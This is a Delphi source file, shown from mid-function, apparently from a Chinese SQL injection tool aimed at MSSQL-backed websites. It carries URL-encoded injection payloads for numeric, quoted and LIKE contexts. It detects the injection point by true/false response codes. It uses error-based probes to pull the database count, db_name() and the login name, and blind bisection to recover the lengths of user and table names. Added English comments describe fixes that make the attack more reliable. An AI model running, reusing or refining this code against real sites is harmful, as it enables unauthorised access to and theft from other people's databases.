📄 cjdatabase_unit.pas
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
//*********************
try
result:=define_unit.GetURLMsg(URL);
except on E:Exception do
Application.MessageBox(pchar('读取数据库名时出错'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);
end;
end;
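function GetDatabaseCount(str_url:string):integer;
{ Error-based probe: asks MSSQL for count(1) from master..sysdatabases, wrapped
  in char(94) ('^') markers so that define_unit.GetURLMsg can presumably pick
  the number out of the server's conversion-error text.
  str_url : the injection point; the URL-encoded probe suffix is appended to it.
  Returns the number of databases, or 0 when the URL is empty, the injection
  method is unknown/unsupported, the request fails, or the reply is not numeric.
  Fixes: Result was left undefined on every early exit and in the except path;
  injection method 3 (the LIKE '%..%' context that Inject_method and
  IfErrorReport can report) had no probe, so str_ext was sent empty. }
var
  str_count:string;
  str_ext:string;
begin
  result:=0;
  if str_url='' then
  begin
    //Application.MessageBox(pchar('注入地址不能为空,不能注入'),'警告',mb_ok+mb_iconinformation);
    exit;
  end;
  case cjdatabase_unit.Inject_methord of
    0: exit;  // injection method not detected yet
    // numeric context: bare AND suffix
    1: str_ext:='%20and%20(select%20char(94)%2Bcast(count(1)%20as%20varchar(100))%2Bchar(94)%20from%20[master]..[sysdatabases])>0';
    // quoted string context: close the quote, re-balance with ''=''
    2: str_ext:='''%20and%20(select%20char(94)%2Bcast(count(1)%20as%20varchar(100))%2Bchar(94)%20from%20[master]..[sysdatabases])>0%20and%20''''=''';
    // LIKE '%..%' context, built the same way as the method-3 probes elsewhere in this unit
    3: str_ext:='%25''%20and%20(select%20char(94)%2Bcast(count(1)%20as%20varchar(100))%2Bchar(94)%20from%20[master]..[sysdatabases])>0%20and%20''%25''=''';
  else
    exit;  // unsupported method value: do not send a request with an empty probe
  end;
  try
    str_count:=define_unit.GetURLMsg(str_url+str_ext);
    // GetURLMsg answers '未知' ("unknown") when nothing could be extracted
    if str_count<>'未知' then
      result:=strtoint(str_count);
  except
    // best effort by design: a non-numeric reply or a transport error leaves Result = 0
  end;
end;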
//******************************************************************************
function Inject_method(str_url:string):integer;
{ Boolean-blind detection of the injection context. For each of three quoting
  styles a true probe (1=1) and a false probe (1=2) are appended to str_url and
  the HTTP status codes compared: 200 for the true form together with 500 for
  the false form counts as a hit.
  Returns 1 (numeric context), 2 (single-quoted string), 3 (LIKE '%..%' string),
  or 0 when no pair matched or an exception occurred (reported via a message box).
  Note: with Delphi's default {$B-} short-circuit evaluation the 1=2 request is
  only sent when the 1=1 request returned 200, same as the original. }
const
  TrueProbe : array[1..3] of string = (
    '%20And%201=1',
    '''%20And%201=1%20And%20''''=''',
    '%25''%20And%201=1%20And%20''%25''=''');
  FalseProbe : array[1..3] of string = (
    '%20And%201=2',
    '''%20And%201=2%20And%20''''=''',
    '%25''%20And%201=2%20And%20''%25''=''');
var
  method:integer;
begin
  result:=0;
  try
    for method:=1 to 3 do
    begin
      if (define_unit.GetURLCode(str_url+TrueProbe[method])=200) and
         (define_unit.GetURLCode(str_url+FalseProbe[method])=500) then
      begin
        result:=method;
        exit;
      end;
    end;
  except on E:Exception do
    Application.MessageBox(pchar('猜解注入方式时出现错误'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);
  end;
end;
//******************************************************************************
//暴力破解用的函数 -- brute-force helper: bisection over a "length < n" probe
function b(min_num,max_num:integer;iTop:integer;iPos:integer;URL:string;sContent:string):integer;
{ Brute-force helper: narrows [min_num,max_num] by bisection using the
  "length < mid" probe a(), then walks the remaining window upward and returns
  (first value for which the probe holds) - 1, or 0 when the walk never sees
  the probe succeed.
  iTop, iPos, URL and sContent are forwarded to a() unchanged; the btype values
  3 (bisection) and 4 (sweep) are passed exactly as before (a() ignores them). }
var
  lo,hi,mid,candidate:integer;
begin
  result:=0;
  lo:=min_num;
  hi:=max_num;
  // The original capped this with a for-loop; the gap shrinks on every pass,
  // so a plain while-loop reaches the same 1..2-wide window.
  while hi-lo>2 do
  begin
    mid:=lo+((hi-lo) div 2);
    if a(mid,iTop,iPos,URL,sContent,3) then
      hi:=mid   // value < mid: lower the upper bound
    else
      lo:=mid;  // value >= mid: raise the lower bound
  end;
  // linear sweep over what is left
  for candidate:=lo to hi do
    if a(candidate,iTop,iPos,URL,sContent,4) then
    begin
      result:=candidate-1;
      break;
    end;
end;
//******************************************************************************
//暴力破解的函数 -- brute-force probe: "len(user) < max_num?" for the current injection context
function UserlenA(max_num:integer;str_url:string;iPos:integer;sContent:string;btype:integer):boolean;
{ Boolean-blind probe: "is len(user) < max_num?" built for the current
  injection context (CJdatabase_unit.Inject_methord) and hex-encoded by
  define_unit.SQLINJECTIONUrlToHex before being appended to str_url.
  max_num : the bound under test.
  str_url : the injection point (note: despite the names, this is the URL and
            the local 'suffix' is the SQL fragment).
  iPos, sContent, btype : unused; kept for call compatibility. An
            ascii(substring(user,iPos,1)) variant once lived here but is
            commented out in the original.
  Returns True when the injected condition is judged to hold: in keyword mode
  (Form_main.CheckBox_keyword) the trimmed keyword appears in the body, otherwise
  the response status is 200. Returns False when the method is 0 (nothing is sent). }
var
  probe,suffix,body:string;
begin
  result:=false;
  probe:=' and (select len(user))<'+inttostr(max_num);
  case CJdatabase_unit.Inject_methord of
    0:
      exit;  // method not detected yet
    1:
      suffix:=probe;                          // numeric context
    2:
      suffix:=''' '+probe+' and ''''=''';     // quoted string context
    3:
      suffix:='%'' '+probe+' and ''%''=''';   // LIKE '%..%' context
  end;
  suffix:=define_unit.SQLINJECTIONUrlToHex(suffix,0);
  if Form_main.CheckBox_keyword.Checked then
  begin
    // keyword mode: the "true" page still contains the operator-chosen marker text
    body:=define_unit.GetURLContent(str_url+suffix);
    result:=pos(trim(Form_main.Edit_keyword.Text),body)>0;
  end
  else
    // status mode: only a 200 is treated as "condition true"
    result:=define_unit.GetURLCode(str_url+suffix)=200;
end;
//******************************************************************************
//暴力破解用的函数 -- brute-force helper: bisection for the length of user
function UserCharLenB(min_num,max_num:integer;iPos:integer;URL:string;sContent:string):integer;
{ Brute-force helper for the length of the MSSQL login name (user): bisects
  [min_num,max_num] with the "len(user) < mid" probe UserlenA(), then sweeps
  the remaining window upward and returns (first value for which the probe
  holds) - 1, or 0 when the sweep never succeeds.
  URL is the injection point; iPos and sContent are forwarded to UserlenA,
  which ignores them; btype 2 is passed exactly as before. }
var
  lo,hi,mid,candidate:integer;
begin
  result:=0;
  lo:=min_num;
  hi:=max_num;
  // the gap shrinks every pass, so the original for-loop cap is not needed
  while hi-lo>2 do
  begin
    mid:=lo+((hi-lo) div 2);
    if UserlenA(mid,URL,iPos,sContent,2) then
      hi:=mid   // len < mid
    else
      lo:=mid;  // len >= mid
  end;
  for candidate:=lo to hi do
    if UserlenA(candidate,URL,iPos,sContent,2) then
    begin
      result:=candidate-1;
      break;
    end;
end;
//******************************************************************************
//暴力破解用的函数 -- brute-force probe: "len(name) of the iTop-th user table < max_num?"
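function a(max_num:integer;iTop:integer;iPos:integer;URL:string;sContent:string;btype:integer):boolean;
{ Boolean-blind probe: "is len(name) of the iTop-th user table (sysobjects
  xtype=char(85), i.e. 'U') in define_unit.FDbName smaller than max_num?"
  The fragment is adapted to the current injection context, hex-encoded by
  define_unit.SQLINJECTIONUrlToHex and appended to URL.
  max_num : the bound under test.   iTop : 1-based table index (TOP n ... ORDER BY id DESC).
  URL     : the injection point.     iPos, sContent, btype : unused, kept for call compatibility.
  FDbName is interpolated inside [...] verbatim; it is operator-supplied here.
  Returns True when the condition is judged true: keyword mode -> the trimmed
  keyword appears in the body; status mode -> HTTP 200. Returns False on a 500,
  on an unknown injection method (after a message box), and -- changed -- when
  the status is neither 200 nor 500 after MaxRetries attempts.
  Fix: the original retried every other status with an unbounded 'goto start'
  and no delay, so a 403/404/redirect or a transport failure put the tool into
  a tight, never-ending request loop against the target. }
const
  MaxRetries = 5;       // attempts before an ambiguous status is given up on
  RetryDelayMs = 1000;  // pause between attempts; the original had sleep(1000) commented out
var
  sql_str:string;
  encode_sql_str:string;
  content:string;
  icode:integer;
  attempt:integer;
begin
  result:=false;
  sql_str:=' and (Select top 1 len(name) from(Select top '+inttostr(iTop)+' id,name from ['+define_unit.FDbName+']..sysobjects where xtype=char(85)) T order by id desc) < '+inttostr(max_num);
  case CJdatabase_unit.Inject_methord of
    0 :
      begin
        Application.MessageBox(pchar('未知的注入方式,不能进行'),pchar('警告'),mb_ok);
        exit;
      end;
    1 : { numeric context: the bare fragment is used as-is } ;
    2 :
      sql_str:=''' '+sql_str+' and ''''=''';    // quoted string context
    3 :
      sql_str:='%'' '+sql_str+' and ''%''=''';  // LIKE '%..%' context
  end;
  encode_sql_str:=define_unit.SQLINJECTIONUrlToHex(sql_str,0);
  if Form_main.CheckBox_keyword.Checked then
  begin
    // keyword mode: one request, decided on the body
    content:=define_unit.GetURLContent(URL+encode_sql_str);
    result:=pos(trim(Form_main.Edit_keyword.Text),content)>0;
    exit;
  end;
  // status mode: 200 = condition true, 500 = condition false; anything else
  // (blocked, redirected, timed out) is retried a bounded number of times.
  for attempt:=1 to MaxRetries do
  begin
    icode:=define_unit.GetURLCode(URL+encode_sql_str);
    if icode=200 then
    begin
      result:=true;
      exit;
    end;
    if icode=500 then
      exit;  // Result stays False
    if attempt<MaxRetries then
      Sleep(RetryDelayMs);  // Windows unit, already in scope (mb_ok comes from it)
  end;
  // Still undecided: report False instead of hanging. The caller's bisection
  // may then be off for this table, but the tool no longer loops forever.
end;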
//******************************************************************************
//暴力破解用的函数,函数判断表的字符长度 -- brute-force helper: determines the character length of a table name
function GetTableCharLen(iTop:integer;URL:string;sContent:string):integer;
{ Brute-force helper: length of the name of the iTop-th user table, found by
  bisecting 1..40 with the "len(name) < mid" probe a() and then sweeping the
  remaining window from lo+1 upward. Returns (first value for which the probe
  holds) - 1, or 0 when the sweep finds nothing (e.g. a name longer than 40).
  URL is the injection point; sContent is forwarded to a(), which ignores it
  (an emptiness check on it is commented out in the original). }
const
  LowerBound = 1;
  UpperBound = 40;  // names longer than this are not resolved
var
  lo,hi,mid,candidate:integer;
begin
  result:=0;
  lo:=LowerBound;
  hi:=UpperBound;
  // bisection; the gap shrinks every pass so no iteration cap is needed
  while hi-lo>2 do
  begin
    mid:=lo+((hi-lo) div 2);
    if a(mid,iTop,0,URL,sContent,1) then
      hi:=mid   // len < mid
    else
      lo:=mid;  // len >= mid
  end;
  // sweep starts one above lo, as in the original
  for candidate:=lo+1 to hi do
    if a(candidate,iTop,0,URL,sContent,1) then
    begin
      result:=candidate-1;
      break;
    end;
end;
//******************************************************************************
//判断注入方式及是否报错 -- detect the injection context and whether the target echoes database errors
function IfErrorReport(str_url:string):integer;
{ Error-based detection of the injection context. Each probe compares a
  char(94)-wrapped varchar (db_name() or user) with the integer 0, which makes
  MSSQL raise a conversion error; define_unit.GetURLMsgBool presumably reports
  whether that error text came back in the page.
  Returns 1 (numeric context), 2 (single-quoted string), 3 (LIKE '%..%' string)
  for the first probe that works, or 0 when none does.
  Note: probe 1 converts db_name() while probes 2 and 3 convert user; only the
  presence of an error is tested here, so the value itself is not used. }
const
  Probes : array[1..3] of string = (
    '%20and(char(94)%2Bdb_name()%2Bchar(94))>0',
    '''%20and(char(94)%2Buser%2Bchar(94))>0%20and%20''''=''',
    '%25''%20and(char(94)%2Buser%2Bchar(94))>0%20and%20''%25''=''');
var
  method:integer;
begin
  result:=0;
  for method:=1 to 3 do
    if define_unit.GetURLMsgBool(str_url+Probes[method]) then
    begin
      result:=method;
      exit;
    end;
end;
//******************************************************************************
//暴力破解用的函数,获得用户字符串的长度 -- brute-force helper: obtains the length of the user string
function GetUserCharLen(str_url:string;sContent:string):integer;
var
str_ext:string;
//URL:string;
middle,min_num,max_num:integer;
i:integer;
begin
min_num:=1;
max_num:=64;
result:=0;
//首先获得注入地址的有效界面
{if sContent='' then
begin
Application.MessageBox(pchar('从注入地址不能获得有效的页面,无法猜解表的长度,退出'),pchar('提示'),mb_ok+mb_iconinformation);
exit;
end ; }
//***********************
//获取表的长度范围
for i:=min_num to max_num do
begin
if max_num-min_num<=2 then
begin
break;
end;
middle:=((max_num-min_num) div 2)+min_num;
if UserLenA(middle,str_url,0,sContent,1) then //如果小于max,就继续缩小max的范围
begin
max_num:=middle;
end
else //如果不小于max,就把min的范围扩大
begin
min_num:=middle;
end;
end;
//循环得出表的字符长度
for i:=min_num+1 to max_num do
begin
if UserLenA(i,str_url,0,sContent,1) then
begin
result:=i-1;
break;
end;
end ;